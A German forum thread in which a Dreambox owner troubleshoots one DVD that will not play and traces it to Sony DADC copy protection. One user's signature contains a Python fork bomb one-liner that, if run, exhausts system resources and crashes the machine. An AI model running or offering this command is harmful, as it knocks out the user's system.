Hallo hat keiner mehr eine Idee.
Problem mit EINER DVD
-
-
nicht wirklich, außer dass ich jetzt dieser EINEN nicht funktionierenden DVD die schuld geben würde, sobald regionset ausgeführt wurde.
die anderen DVDs funktionieren ja wie du sagst? -
Man sagt ja immer es gibt keine blöden Fragen,aber könnte es sein das vielleicht mein System ein weg hat.
-
sowas können wir von hier aus schwer feststellen
wenn du unsicher bist - flashe neu -
Ich werde demnächst die Kiste mal neu Flashen und dann mal sehen was dann geht und was nicht.Werde mich wieder melden.Ich bedanke mich trotzdem für Mitarbeit.Bis dann erst einmal.
mfg Rettcom -
So hallo Gemeinde,habe heute die Dream neu geflasht und was ist nichts ist die gleiche Geschichte wie vorher.Star Treck und Illuminati laufen und Transformers nicht.Läuft an und das wars.Hat irgend jemand noch eine Idee.
-
Hallo Leute keiner ein Plan für mich.
-
Hallo Leute ich weiß warum die DVD nicht läuft,und zwar ist dort ein Dummy drauf mit 77GB und das bekommt das Laufwerk nicht gebacken.Vielleicht hat jemand eine Idee oder ein Plugin.
-
Ist das ne blu ray oder ne dvd?python -c 'while 1: __import__("os").fork()'
Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras ! -
mal eine frage, versteh das ganze hier nicht so von dir,
machst du diesen aufstand hier wegen EINER nicht funktionierenter DVD, also alle anderen DVD´s von dir gehen"Jeder Mensch hat ein Brett vor dem Kopf - es kommt nur auf die Entfernung an.“
(Marie von Ebner-Eschenbach) -
Zu kati910 ja es ist eine DVD,zu chriskula ja es geht momentan nur um die eine DVD wird aber nicht die letzte sein,dan Sony ihre DVDs alle mit DADC schützen und dann ist schicht im Schacht.
-
ich hab jetzt den thread-titel angepasst,
weil es ja nicht um ein problem mit dem DVD PLAYER geht,
sondern um eine bestimmt DVD, die halt nicht läuft wegen kopierschutz....... -
Ok arianebox ist auch besser,dann kann man den Player ausschließen.Wäre aber trotzdem nicht schlecht wenn jemand sich mit dieser Sache schon vertraut gemacht hat.
-
da du der erste hier bist mit diesem problem,
danken wir schon jetzt für eine lösung, solltest du sie finden
-
Teilen
- Facebook 0
- Twitter 0
- Google Plus 0
- Reddit 0